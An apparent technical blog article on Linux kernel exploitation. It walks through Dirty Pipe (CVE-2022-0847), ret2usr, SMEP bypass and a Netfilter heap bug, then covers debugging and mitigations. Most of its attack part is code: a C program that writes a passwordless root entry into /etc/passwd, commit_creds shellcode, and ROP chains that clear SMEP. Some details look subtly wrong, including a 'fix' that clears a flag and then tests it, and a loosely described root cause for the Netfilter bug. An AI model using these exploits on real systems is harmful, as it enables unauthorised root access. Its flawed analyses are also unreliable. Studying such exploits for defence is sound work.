Linux Kernel Exploitation: CVE Analysis and ret2usr Attack Techniques

Mamoun Tarsha-Kurdi
9 min read

Introduction

Linux kernel exploitation requires understanding kernel internals, protection mechanisms (SMEP, SMAP, KASLR), and vulnerability patterns. This article examines real CVEs and exploitation techniques used in modern kernel exploits.

Dirty Pipe (CVE-2022-0847)

Vulnerability Background

Dirty Pipe allows unprivileged users to write to arbitrary read-only files, leading to privilege escalation by overwriting /etc/passwd or /etc/shadow.

Affected versions: Linux 5.8 - 5.16.11

Root Cause Analysis

// Vulnerable code in fs/pipe.c
static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;

    // ... setup code

    for (;;) {
        if (!pipe->readers) {
            send_sig(SIGPIPE, current, 0);
            ret = -EPIPE;
            break;
        }

        head = pipe->head;
        // ... find free slot

        // VULNERABILITY: Reuses page cache pages without clearing flags
        struct pipe_buffer *buf = &pipe->bufs[head & mask];

        // If page is from splice(), PIPE_BUF_FLAG_CAN_MERGE is set
        // This allows merging data into read-only file pages!
        if (buf->flags & PIPE_BUF_FLAG_CAN_MERGE) {
            // Write data directly into page cache
            ret = copy_page_from_iter(buf->page, buf->offset + buf->len,
                                     bytes, from);
        }
    }
}

The bug: When a pipe buffer is created via splice() from a file, the PIPE_BUF_FLAG_CAN_MERGE flag is set. If the pipe is then used for writing, this flag is not cleared, allowing writes to merge into pages that may belong to read-only files.

Exploitation

// CVE-2022-0847 exploit
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <unistd.h>

#define DATA "root::0:0:root:/root:/bin/bash\n"

int main() {
    int pipe_fds[2];
    int target_fd, arbitrary_fd;

    // 1. Create pipe
    if (pipe(pipe_fds) < 0) {
        perror("pipe");
        return 1;
    }

    // 2. Fill pipe with data from an arbitrary file
    // This sets PIPE_BUF_FLAG_CAN_MERGE on pipe buffers
    arbitrary_fd = open("/etc/hostname", O_RDONLY);
    if (arbitrary_fd < 0) {
        perror("open arbitrary");
        return 1;
    }

    // Splice data into pipe (this sets the vulnerable flag)
    if (splice(arbitrary_fd, NULL, pipe_fds[1], NULL, 1, 0) < 0) {
        perror("splice");
        return 1;
    }
    close(arbitrary_fd);

    // 3. Drain pipe (but buffers with flag remain)
    char buffer[4096];
    read(pipe_fds[0], buffer, 1);

    // 4. Open target read-only file
    target_fd = open("/etc/passwd", O_RDONLY);
    if (target_fd < 0) {
        perror("open target");
        return 1;
    }

    // 5. Splice target file into pipe
    // This reuses buffers with PIPE_BUF_FLAG_CAN_MERGE set
    if (splice(target_fd, NULL, pipe_fds[1], NULL, 1, 0) < 0) {
        perror("splice target");
        return 1;
    }

    // 6. Write malicious data to pipe
    // Due to PIPE_BUF_FLAG_CAN_MERGE, this writes to /etc/passwd page cache!
    write(pipe_fds[1], DATA, strlen(DATA));

    printf("[+] /etc/passwd overwritten!\n");
    printf("[+] New root entry: %s\n", DATA);
    printf("[+] Run: su root (no password needed)\n");

    close(pipe_fds[0]);
    close(pipe_fds[1]);
    close(target_fd);

    return 0;
}

Exploitation steps:

  1. Create a pipe
  2. Splice arbitrary file → sets PIPE_BUF_FLAG_CAN_MERGE
  3. Drain pipe (buffers remain)
  4. Splice target read-only file (reuses flagged buffers)
  5. Write to pipe → writes to read-only file’s page cache
  6. File changes persist when flushed to disk

Patch Analysis

// Fixed version (Linux 5.16.12+)
static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    // ...

    for (;;) {
        // ...

        struct pipe_buffer *buf = &pipe->bufs[head & mask];

        // FIX: Clear CAN_MERGE flag when buffer is reused
        buf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;

        if (buf->flags & PIPE_BUF_FLAG_CAN_MERGE) {
            // This branch now unreachable for reused buffers
            ret = copy_page_from_iter(buf->page, buf->offset + buf->len,
                                     bytes, from);
        }
    }
}

ret2usr Attack Technique

Concept

ret2usr (return-to-user) exploits redirect kernel execution to userspace code with kernel privileges.

Prerequisites:

  • Kernel vulnerability (use-after-free, buffer overflow, etc.)
  • Ability to control kernel RIP
  • SMEP disabled or bypassed

Exploitation Steps

// 1. Prepare shellcode in userspace
#include <sys/mman.h>
#include <string.h>

void* prepare_payload() {
    // Allocate executable memory at low address
    void* shellcode_addr = mmap((void*)0x10000000, 0x1000,
                                PROT_READ | PROT_WRITE | PROT_EXEC,
                                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
                                -1, 0);

    if (shellcode_addr == MAP_FAILED) {
        perror("mmap");
        return NULL;
    }

    // Shellcode: commit_creds(prepare_kernel_cred(0))
    unsigned char shellcode[] = {
        0x48, 0x31, 0xff,                   // xor rdi, rdi
        0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, // movabs rax, prepare_kernel_cred
              0x00, 0x00, 0x00, 0x00,
        0xff, 0xd0,                         // call rax
        0x48, 0x89, 0xc7,                   // mov rdi, rax
        0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, // movabs rax, commit_creds
              0x00, 0x00, 0x00, 0x00,
        0xff, 0xd0,                         // call rax
        0x48, 0x31, 0xc0,                   // xor rax, rax
        0xc3                                // ret
    };

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));
    return shellcode_addr;
}

// 2. Trigger vulnerability to hijack kernel control flow
void trigger_vuln(void* shellcode) {
    int fd = open("/dev/vulnerable_device", O_RDWR);

    // Assuming vulnerable ioctl that allows RIP control
    unsigned long payload[] = {
        0x4141414141414141,  // padding
        0x4242424242424242,  // rbp
        (unsigned long)shellcode  // return address → userspace
    };

    ioctl(fd, VULN_CMD, payload);

    // If successful, we now have root
    if (getuid() == 0) {
        printf("[+] Got root!\n");
        system("/bin/sh");
    }
}

SMEP Bypass

SMEP (Supervisor Mode Execution Prevention) prevents kernel from executing userspace code.

Bypass technique: ROP to disable SMEP

// ROP chain to disable SMEP
unsigned long rop_chain[] = {
    // pop rdi; ret
    0xffffffff81000001,

    // CR4 value with SMEP bit (bit 20) cleared
    // Original: 0x407f0  (SMEP enabled)
    // Modified: 0x6f0    (SMEP disabled)
    0x6f0,

    // native_write_cr4 (write CR4 register)
    0xffffffff81002222,

    // Address of shellcode in userspace
    0x10000000
};

Use-After-Free Exploitation

CVE-2021-22555 (Netfilter)

// Vulnerable code in net/netfilter/x_tables.c
static int xt_compat_target_from_user(struct xt_entry_target *t,
                                      void **dstptr, unsigned int *size)
{
    struct compat_xt_entry_target *ct = (void *)t;
    struct xt_entry_target *rt;
    int ret;

    // Allocate kernel buffer for target
    rt = *dstptr;
    memcpy(rt, t, sizeof(*ct));

    // VULNERABILITY: Size not validated properly
    // If target_size < sizeof(*rt), heap overflow occurs
    if (ct->target_size < sizeof(*rt)) {
        // Should reject, but doesn't!
        memcpy(rt->data, ct->data, ct->target_size - sizeof(*ct));
    }
}

Exploitation:

#include <linux/netfilter/x_tables.h>
#include <sys/socket.h>

void exploit_netfilter() {
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

    // Craft malicious compat iptables rule
    struct ipt_replace *repl;
    repl = malloc(sizeof(*repl) + 0x1000);

    strcpy(repl->name, "filter");
    repl->num_entries = 1;
    repl->size = 0x1000;

    // Malicious target with undersized buffer
    struct xt_entry_target *target = (void*)(repl + 1);
    target->target_size = 0x10;  // Too small!

    // Trigger vulnerability
    setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, repl, sizeof(*repl) + 0x1000);

    // Spray heap with controlled objects
    for (int i = 0; i < 1000; i++) {
        // Allocate objects to occupy freed memory
        // ...
    }
}

Kernel Debugging Setup

QEMU + GDB

#!/bin/bash
# Build kernel with debugging symbols
cd linux-source
make defconfig
echo "CONFIG_DEBUG_INFO=y" >> .config
echo "CONFIG_DEBUG_INFO_DWARF4=y" >> .config
echo "CONFIG_GDB_SCRIPTS=y" >> .config
echo "CONFIG_FRAME_POINTER=y" >> .config
make -j$(nproc)

# Create minimal root filesystem
mkdir -p rootfs/{bin,sbin,etc,proc,sys,dev}
cd rootfs
cat > init << 'EOF'
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
exec /bin/sh
EOF
chmod +x init

# Create initramfs
find . | cpio -o -H newc | gzip > ../rootfs.cpio.gz

# Launch QEMU with debugging
qemu-system-x86_64 \
    -kernel arch/x86/boot/bzImage \
    -initrd rootfs.cpio.gz \
    -nographic \
    -append "console=ttyS0 nokaslr" \
    -s \
    -S  # Wait for GDB connection

# In another terminal: GDB
gdb vmlinux
(gdb) target remote :1234
(gdb) b prepare_kernel_cred
(gdb) c

Debugging Kernel Exploits

# GDB Python script for kernel exploit debugging
import gdb

class FindCredStruct(gdb.Command):
    """Find cred structure for current task"""

    def __init__(self):
        super(FindCredStruct, self).__init__("find-cred", gdb.COMMAND_USER)

    def invoke(self, arg, from_tty):
        # Get current task_struct
        current = gdb.parse_and_eval("$lx_current()")

        # Get cred pointer
        cred = current['cred']

        print(f"task_struct: {current}")
        print(f"cred: {cred}")
        print(f"uid: {cred['uid']['val']}")
        print(f"gid: {cred['gid']['val']}")
        print(f"euid: {cred['euid']['val']}")

FindCredStruct()

# Usage in GDB:
# (gdb) find-cred

Protection Mechanisms

KASLR (Kernel Address Space Layout Randomization)

// Leak kernel address via /proc/kallsyms (requires root)
void leak_kernel_base() {
    FILE* fp = fopen("/proc/kallsyms", "r");
    char buf[256];
    unsigned long addr;

    while (fgets(buf, sizeof(buf), fp)) {
        if (strstr(buf, "startup_64")) {
            sscanf(buf, "%lx", &addr);
            printf("[*] startup_64: 0x%lx\n", addr);

            // Calculate kernel base
            unsigned long kbase = addr & 0xffffffffff000000;
            printf("[+] Kernel base: 0x%lx\n", kbase);
            break;
        }
    }
    fclose(fp);
}

// Alternative: Leak via timing attack
unsigned long leak_kaslr_timing() {
    // Exploit CPU cache timing to determine kernel addresses
    // Uses speculative execution side channels
    // (Implementation complex, omitted for brevity)
}

SMEP/SMAP

// Check SMEP/SMAP status
void check_protections() {
    unsigned long cr4;

    // Read CR4 register (requires kernel access)
    asm volatile("mov %%cr4, %0" : "=r"(cr4));

    printf("CR4: 0x%lx\n", cr4);
    printf("SMEP (bit 20): %s\n", (cr4 & (1<<20)) ? "Enabled" : "Disabled");
    printf("SMAP (bit 21): %s\n", (cr4 & (1<<21)) ? "Enabled" : "Disabled");
}

// Bypass via stack pivot to kernel data segment
unsigned long rop_bypass_smep[] = {
    // pop rcx; ret
    0xffffffff81001111,
    0x6f0,  // CR4 value (SMEP disabled)

    // mov cr4, rcx; ret
    0xffffffff81002222,

    // Continue exploitation...
};

Mitigation Techniques

Secure Coding Practices

// INSECURE: No bounds checking
void vulnerable_copy(char* dest, const char* src, size_t len) {
    memcpy(dest, src, len);  // len is user-controlled!
}

// SECURE: Bounds checking
void secure_copy(char* dest, size_t dest_size, const char* src, size_t len) {
    if (len > dest_size) {
        pr_err("Copy would overflow buffer\n");
        return;
    }

    memcpy(dest, src, len);
}

// SECURE: Use kernel-provided safe functions
void best_copy(char* dest, const char* src, size_t len) {
    // copy_from_user returns bytes NOT copied (0 on success)
    if (copy_from_user(dest, src, len)) {
        pr_err("Failed to copy from userspace\n");
        return;
    }
}

Runtime Checks

// Enable runtime checks
#ifdef CONFIG_FORTIFY_SOURCE
// Compiler instruments memcpy/strcpy with size checks
#endif

#ifdef CONFIG_UBSAN
// Undefined Behavior Sanitizer catches integer overflows
#endif

#ifdef CONFIG_KASAN
// Kernel Address Sanitizer detects memory errors
#endif

Conclusion

Linux kernel exploitation requires deep understanding of:

  1. Kernel internals (memory management, syscalls, drivers)
  2. Vulnerability classes (UAF, buffer overflows, race conditions)
  3. Protection mechanisms (SMEP, SMAP, KASLR, PAN)
  4. Exploitation techniques (ret2usr, ROP, heap spray)
  5. Debugging tools (GDB, QEMU, crash dumps)

Modern kernels include multiple defense layers, making exploitation increasingly difficult but not impossible. Responsible disclosure and patch analysis remain critical for security research.

References

  1. CVE-2022-0847 - Dirty Pipe Vulnerability
  2. CVE-2021-22555 - Netfilter Heap Out-of-Bounds Write
  3. Corbet, J. (2022). “Kernel Address Sanitizer”
  4. Linux Kernel Documentation - Security
  5. Kerrisk, M. (2021). “The Linux Programming Interface”